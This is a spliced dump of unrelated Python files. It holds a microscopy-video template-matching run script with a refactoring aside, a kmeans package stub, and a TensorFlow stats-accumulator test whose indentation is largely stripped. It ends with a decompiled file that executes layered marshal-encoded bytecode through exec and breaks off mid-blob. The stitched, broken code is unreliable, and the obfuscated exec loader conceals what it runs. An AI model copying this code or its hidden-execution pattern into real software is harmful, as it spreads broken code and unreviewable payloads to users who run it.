thres_binary = np.arange(0.7, 0.96, 0.05)  # candidate thresholds; the per-video best value is set below
# =====================================================
# BRAIN 1
# =====================================================
video = "brain_1"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '3'
model = 'VGG19'
thresh = 0.85
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='B1_output2D_centroids.txt',
verbosity=False)
# =====================================================
# BRAIN 2
# =====================================================
video = "brain_2"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '3'
model = 'DenseNet121'
thresh = 0.90
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='B2_output2D_centroids.txt',
verbosity=False)
# =====================================================
# SPINALCORD 1
# =====================================================
video = "spinalcord_1"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '1'
model = 'ResNet50'
thresh = 0.80
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='SC_output2D_centroids.txt',
verbosity=False)
# =====================================================
# CREMASTER 1
# =====================================================
video = "cremaster_1"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '2'
model = 'VGG19'
thresh = 0.85
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='C1_output2D_centroids.txt',
verbosity=False)
# =====================================================
# CREMASTER 2
# =====================================================
video = "cremaster_2"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '3'
model = 'VGG16'
thresh = 0.80
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='C2_output2D_centroids.txt',
verbosity=False)
# =====================================================
# MESENTERY 1
# =====================================================
video = "mesentery_1"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '2'
model = 'VGG16'
thresh = 0.75
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='ME_output2D_centroids.txt',
         verbosity=False)
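The six per-video blocks above repeat the same call and differ only in a few parameters. A table-driven loop keeps the configuration in one place; this is a sketch (the `run` loop stubs out the real `dcnn_mtm` call, whose keyword arguments are taken verbatim from the blocks above):

```python
import os

# Best configuration per video, as hard-coded in the blocks above:
# (video, model, n_templates, threshold, output-file prefix)
BEST_CONFIGS = [
    ("brain_1",      "VGG19",       "3", 0.85, "B1"),
    ("brain_2",      "DenseNet121", "3", 0.90, "B2"),
    ("spinalcord_1", "ResNet50",    "1", 0.80, "SC"),
    ("cremaster_1",  "VGG19",       "2", 0.85, "C1"),
    ("cremaster_2",  "VGG16",       "3", 0.80, "C2"),
    ("mesentery_1",  "VGG16",       "2", 0.75, "ME"),
]

def build_kwargs(base_path, video, model, n_tmpl, thresh, prefix):
    """Assemble the keyword arguments for one dcnn_mtm run."""
    root = os.path.join(base_path, video)
    return dict(
        folder_path=os.path.join(root, "frames") + "/",
        mask_img=os.path.join(root, video + "_mask.png"),
        ground_truth=os.path.join(root, video + "_gt.txt"),
        template=os.path.join(root, "%s_%s-templates.txt" % (video, n_tmpl)),
        dcnn_model=model,
        thres_binary=thresh,
        output_points="%s_output2D_centroids.txt" % prefix,
        verbosity=False,
    )

if __name__ == "__main__":
    base = "/home/brunoggregorio/Workspace/data/dataset/"
    for cfg in BEST_CONFIGS:
        kwargs = build_kwargs(base, *cfg)
        # dcnn_mtm(**kwargs)  # uncomment to run the real pipeline
```

Adding a new video then means adding one tuple to `BEST_CONFIGS` rather than copying a whole block.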
d20a23d97bcbb6ba2a8e98bb85d0fb0c2507ca07 | 41 | py | Python | utils/dpbench_python/kmeans/__init__.py | geexie/dpbench | 7d41409ded3c816f35003bc5aea071852bceb892 | ["BSD-2-Clause"]
from .kmeans_python import kmeans_python
d21a0f16621f720d496d962030af35428cc044ef | 20,880 | py | Python | tensorflow/contrib/boosted_trees/python/kernel_tests/stats_accumulator_ops_test.py | MathMachado/tensorflow | 56afda20b15f234c23e8393f7e337e7dd2659c2d | ["Apache-2.0"]
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test for checking stats accumulator related ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.boosted_trees.python.ops import stats_accumulator_ops
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class StatsAccumulatorScalarTest(test_util.TensorFlowTestCase):
"""Tests for scalar gradients and hessians accumulator."""
def testSimpleAcculumator(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
gradients=[0.1, 0.3],
hessians=[0.2, 0.4])
op2 = accumulator.add(0, [1], [[2, 0]], [0.1], [0.2])
with ops.control_dependencies([op1, op2]):
num_updates, partition, bucket_ids, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, bucket_ids, grads, hessians = sess.run(
[num_updates, partition, bucket_ids, grads, hessians])
result = _AccumulatorResultToDict(partition, bucket_ids, grads, hessians)
self.assertEqual(num_updates, 2)
self.assertEqual(len(result), 2)
# Key is partition, bucket, dimension
self.assertAllClose(result[(1, 2, 0)], [0.2, 0.4])
self.assertAllClose(result[(2, 3, 0)], [0.3, 0.4])
def testMultidimensionalAcculumator(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2, 1],
feature_ids=[[2, 2], [3, 0], [2, 2]],
gradients=[0.1, 0.3, 0.8],
hessians=[0.2, 0.4, -9])
op2 = accumulator.add(0, [2, 1], [[3, 1], [2, 2]], [0.1, 1], [0.2, -1])
with ops.control_dependencies([op1, op2]):
num_updates, partition, bucket_ids, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, bucket_ids, grads, hessians = sess.run(
[num_updates, partition, bucket_ids, grads, hessians])
result = _AccumulatorResultToDict(partition, bucket_ids, grads, hessians)
self.assertEqual(num_updates, 2)
self.assertEqual(len(result), 3)
# Key is partition, bucket, dimension.
self.assertAllClose(result[(1, 2, 2)], [1.9, -9.8])
self.assertAllClose(result[(2, 3, 0)], [0.3, 0.4])
self.assertAllClose(result[(2, 3, 1)], [0.1, 0.2])
def testDropStaleUpdate(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
gradients=[0.1, 0.3],
hessians=[0.2, 0.4])
op2 = accumulator.add(
stamp_token=-1,
partition_ids=[1],
feature_ids=[[2, 0]],
gradients=[0.1],
hessians=[0.2])
with ops.control_dependencies([op1, op2]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(num_updates, 1)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 0)], [0.1, 0.2])
self.assertAllClose(result[(2, 3, 0)], [0.3, 0.4])
def testSerialize(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
gradients=[0.1, 0.3],
hessians=[0.2, 0.4])
with ops.control_dependencies([op1]):
(stamp_token, num_updates, partition_1, feature_1, grads_1,
hessians_1) = accumulator.saveable.serialize()
# Make sure that the accumulator hasn't changed during serialization.
with ops.control_dependencies([stamp_token]):
num_updates_2, partition_2, feature_2, grads_2, hessians_2 = (
accumulator.flush(stamp_token=0, next_stamp_token=1))
(stamp_token, num_updates, partition_1, feature_1, grads_1, hessians_1,
num_updates_2, partition_2, feature_2, grads_2, hessians_2) = sess.run(
[
stamp_token, num_updates, partition_1, feature_1, grads_1,
hessians_1, num_updates_2, partition_2, feature_2, grads_2,
hessians_2
])
result_1 = _AccumulatorResultToDict(partition_1, feature_1, grads_1,
hessians_1)
result_2 = _AccumulatorResultToDict(partition_2, feature_2, grads_2,
hessians_2)
self.assertEqual(num_updates, 1)
self.assertEqual(num_updates_2, 1)
self.assertEqual(len(result_1), 2)
self.assertAllClose(result_1[(1, 2, 0)], [0.1, 0.2])
self.assertAllClose(result_1[(2, 3, 0)], [0.3, 0.4])
self.assertAllEqual(result_1, result_2)
self.assertEqual(0, stamp_token)
def testDeserialize(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
# These will be deleted due to deserialize call.
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 1]],
gradients=[0.1, 0.3],
hessians=[0.2, 0.4])
with ops.control_dependencies([op1]):
deserialize = (
accumulator.saveable.deserialize(
stamp_token=2,
num_updates=3,
partition_ids=[3, 4],
feature_ids=[[5, 0], [6, 2]],
gradients=[0.4, 0.5],
hessians=[0.6, 0.7]))
with ops.control_dependencies([deserialize]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=2, next_stamp_token=3)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads,
hessians)
self.assertEqual(num_updates, 3)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(3, 5, 0)], [0.4, 0.6])
self.assertAllClose(result[(4, 6, 2)], [0.5, 0.7])
def testMakeSummary(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
partition, feature, grads, hessians = accumulator._make_summary(
partition_ids=[1, 2, 1],
feature_ids=[[2, 0], [3, 1], [2, 0]],
gradients=[0.1, 0.3, 0.1],
hessians=[0.2, 0.4, 0.2])
partition, feature, grads, hessians = sess.run(
[partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 0)], [0.2, 0.4])
self.assertAllClose(result[(2, 3, 1)], [0.3, 0.4])
class StatsAccumulatorTensorTest(test_util.TensorFlowTestCase):
"""Tests for tensor gradients and hessians accumulator."""
def testSimpleAcculumator(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07,
0.08]]])
op2 = accumulator.add(
stamp_token=0,
partition_ids=[1],
feature_ids=[[2, 0]],
gradients=[[0.10, 0.11]],
hessians=[[[0.011, 0.022], [0.033, 0.044]]])
with ops.control_dependencies([op1, op2]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(num_updates, 2)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 0)][0], [0.20, 0.21])
self.assertAllClose(result[(1, 2, 0)][1],
[[0.021, 0.042], [0.063, 0.084]])
self.assertAllClose(result[(2, 3, 0)][0], [0.2, 0.2])
self.assertAllClose(result[(2, 3, 0)][1], [[0.05, 0.06], [0.07, 0.08]])
def testMultidimensionalAcculumator(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 4], [3, 1]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07,
0.08]]])
op2 = accumulator.add(
stamp_token=0,
partition_ids=[1],
feature_ids=[[2, 4]],
gradients=[[0.10, 0.11]],
hessians=[[[0.011, 0.022], [0.033, 0.044]]])
with ops.control_dependencies([op1, op2]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(num_updates, 2)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 4)][0], [0.20, 0.21])
self.assertAllClose(result[(1, 2, 4)][1],
[[0.021, 0.042], [0.063, 0.084]])
self.assertAllClose(result[(2, 3, 1)][0], [0.2, 0.2])
self.assertAllClose(result[(2, 3, 1)][1], [[0.05, 0.06], [0.07, 0.08]])
def testDropStaleUpdate(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 5], [3, 0]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07,
0.08]]])
op2 = accumulator.add(
stamp_token=-1,
partition_ids=[1],
feature_ids=[[2, 5]],
gradients=[[0.10, 0.11]],
hessians=[[[0.011, 0.022], [0.033, 0.044]]])
with ops.control_dependencies([op1, op2]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(num_updates, 1)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 5)][0], [0.1, 0.1])
self.assertAllClose(result[(1, 2, 5)][1], [[0.01, 0.02], [0.03, 0.04]])
self.assertAllClose(result[(2, 3, 0)][0], [0.2, 0.2])
self.assertAllClose(result[(2, 3, 0)][1], [[0.05, 0.06], [0.07, 0.08]])

  def testSerialize(self):
    with self.cached_session() as sess:
      accumulator = stats_accumulator_ops.StatsAccumulator(
          stamp_token=0,
          gradient_shape=tensor_shape.TensorShape([2]),
          hessian_shape=tensor_shape.TensorShape([2, 2]))
      with ops.control_dependencies([accumulator.initializer]):
        op1 = accumulator.add(
            stamp_token=0,
            partition_ids=[1, 2],
            feature_ids=[[2, 0], [3, 0]],
            # Two values for each gradient.
            gradients=[[0.1, 0.1], [0.2, 0.2]],
            # A 2x2 matrix for each hessian.
            hessians=[[[0.01, 0.02], [0.03, 0.04]],
                      [[0.05, 0.06], [0.07, 0.08]]])

      with ops.control_dependencies([op1]):
        (stamp_token, num_updates_1, partition_1, feature_1, grads_1,
         hessians_1) = accumulator.saveable.serialize()
        # Make sure that the accumulator hasn't changed during serialization.
        with ops.control_dependencies([stamp_token]):
          num_updates_2, partition_2, feature_2, grads_2, hessians_2 = (
              accumulator.flush(stamp_token=0, next_stamp_token=1))

      (stamp_token, num_updates_1, partition_1, feature_1, grads_1,
       hessians_1, num_updates_2, partition_2, feature_2, grads_2,
       hessians_2) = sess.run([
           stamp_token, num_updates_1, partition_1, feature_1, grads_1,
           hessians_1, num_updates_2, partition_2, feature_2, grads_2,
           hessians_2
       ])

    result_1 = _AccumulatorResultToDict(partition_1, feature_1, grads_1,
                                        hessians_1)
    result_2 = _AccumulatorResultToDict(partition_2, feature_2, grads_2,
                                        hessians_2)
    self.assertEqual(num_updates_1, 1)
    self.assertEqual(num_updates_2, 1)
    self.assertEqual(len(result_1), 2)
    self.assertAllClose(result_1[(1, 2, 0)][0], [0.1, 0.1])
    self.assertAllClose(result_1[(1, 2, 0)][1], [[0.01, 0.02], [0.03, 0.04]])
    self.assertAllClose(result_1[(2, 3, 0)][0], [0.2, 0.2])
    self.assertAllClose(result_1[(2, 3, 0)][1], [[0.05, 0.06], [0.07, 0.08]])
    self.assertAllEqual(result_1[(1, 2, 0)][0], result_2[(1, 2, 0)][0])
    self.assertAllEqual(result_1[(1, 2, 0)][1], result_2[(1, 2, 0)][1])
    self.assertAllEqual(result_1[(2, 3, 0)][0], result_2[(2, 3, 0)][0])
    self.assertAllEqual(result_1[(2, 3, 0)][1], result_2[(2, 3, 0)][1])

  def testDeserialize(self):
    with self.cached_session() as sess:
      accumulator = stats_accumulator_ops.StatsAccumulator(
          stamp_token=0,
          gradient_shape=tensor_shape.TensorShape([2]),
          hessian_shape=tensor_shape.TensorShape([2, 2]))
      with ops.control_dependencies([accumulator.initializer]):
        # These stats will be deleted by the deserialize call below.
        op1 = accumulator.add(
            stamp_token=0,
            partition_ids=[1, 2],
            feature_ids=[[2, 0], [3, 0]],
            # Two values for each gradient.
            gradients=[[0.1, 0.1], [0.2, 0.2]],
            # A 2x2 matrix for each hessian.
            hessians=[[[0.01, 0.02], [0.03, 0.04]],
                      [[0.05, 0.06], [0.07, 0.08]]])

      with ops.control_dependencies([op1]):
        deserialize = accumulator.saveable.deserialize(
            stamp_token=2,
            num_updates=3,
            partition_ids=[3, 4],
            feature_ids=[[4, 0], [5, 0]],
            # Two values for each gradient.
            gradients=[[0.3, 0.3], [0.5, 0.5]],
            # A 2x2 matrix for each hessian.
            hessians=[[[0.03, 0.04], [0.05, 0.06]],
                      [[0.07, 0.08], [0.09, 0.10]]])

      with ops.control_dependencies([deserialize]):
        num_updates, partition, feature, grads, hessians = accumulator.flush(
            stamp_token=2, next_stamp_token=3)
      num_updates, partition, feature, grads, hessians = sess.run(
          [num_updates, partition, feature, grads, hessians])

    result = _AccumulatorResultToDict(partition, feature, grads, hessians)
    self.assertEqual(num_updates, 3)
    self.assertEqual(len(result), 2)
    self.assertAllClose(result[(3, 4, 0)][0], [0.3, 0.3])
    self.assertAllClose(result[(3, 4, 0)][1], [[0.03, 0.04], [0.05, 0.06]])
    self.assertAllClose(result[(4, 5, 0)][0], [0.5, 0.5])
    self.assertAllClose(result[(4, 5, 0)][1], [[0.07, 0.08], [0.09, 0.10]])

  def testMakeSummary(self):
    with self.cached_session() as sess:
      accumulator = stats_accumulator_ops.StatsAccumulator(
          stamp_token=0,
          gradient_shape=tensor_shape.TensorShape([2]),
          hessian_shape=tensor_shape.TensorShape([2, 2]))
      partition, feature, grads, hessians = accumulator._make_summary(
          partition_ids=[1, 2, 1],
          feature_ids=[[2, 0], [3, 2], [2, 0]],
          # Two values for each gradient.
          gradients=[[0.1, 0.1], [0.2, 0.2], [0.10, 0.11]],
          # A 2x2 matrix for each hessian.
          hessians=[[[0.01, 0.02], [0.03, 0.04]],
                    [[0.05, 0.06], [0.07, 0.08]],
                    [[0.011, 0.022], [0.033, 0.044]]])
      partition, feature, grads, hessians = sess.run(
          [partition, feature, grads, hessians])

    result = _AccumulatorResultToDict(partition, feature, grads, hessians)
    self.assertEqual(len(result), 2)
    self.assertAllClose(result[(1, 2, 0)][0], [0.20, 0.21])
    self.assertAllClose(result[(1, 2, 0)][1],
                        [[0.021, 0.042], [0.063, 0.084]])
    self.assertAllClose(result[(2, 3, 2)][0], [0.2, 0.2])
    self.assertAllClose(result[(2, 3, 2)][1], [[0.05, 0.06], [0.07, 0.08]])


def _AccumulatorResultToDict(partition, feature, grads, hessians):
  """Converts the inputs to a dictionary since the ordering changes."""
  return {(partition[i], feature[i, 0], feature[i, 1]): (grads[i], hessians[i])
          for i in range(len(partition))}
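The helper's keying scheme can be sketched standalone, outside a TensorFlow session. This is an illustrative example, not part of the test suite: numpy arrays stand in for the tensors returned by `flush`, and the values are made up. Each row `i` of the outputs becomes a dict entry keyed by `(partition_ids[i], feature_ids[i][0], feature_ids[i][1])`, which is why the assertions above can look up results order-independently.

```python
import numpy as np


def _AccumulatorResultToDict(partition, feature, grads, hessians):
  """Converts the inputs to a dictionary since the ordering changes."""
  return {(partition[i], feature[i, 0], feature[i, 1]): (grads[i], hessians[i])
          for i in range(len(partition))}


# Illustrative flush-style outputs for two accumulated slots.
partition = np.array([1, 2])
feature = np.array([[2, 0], [3, 0]])
grads = np.array([[0.1, 0.1], [0.2, 0.2]])
hessians = np.array([[[0.01, 0.02], [0.03, 0.04]],
                     [[0.05, 0.06], [0.07, 0.08]]])

result = _AccumulatorResultToDict(partition, feature, grads, hessians)
# result maps (1, 2, 0) and (2, 3, 0) to their (gradient, hessian) pairs.
```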


if __name__ == "__main__":
  googletest.main()
] | 41 | 2020-03-16T22:36:38.000Z | 2022-03-17T14:47:19.000Z | # Decompiled At : Jan 16 15:10:57 2020
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46) # [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https:// # Embedded file name: exec
# Compiled at: 2020-01-01 21:55:11
import marshal,os
try:
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xde\xb8\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsI\xb8\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb4\xb7\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1f\xb7\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8a\xb6\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf5\xb5\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs`\xb5\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xcb\xb4\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01
\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs6\xb4\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa1\xb3\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x0c\xb3\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsw\xb2\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe2\xb1\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsM\xb1\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb8\xb0\x00\x00c\x00\x00\x00\x00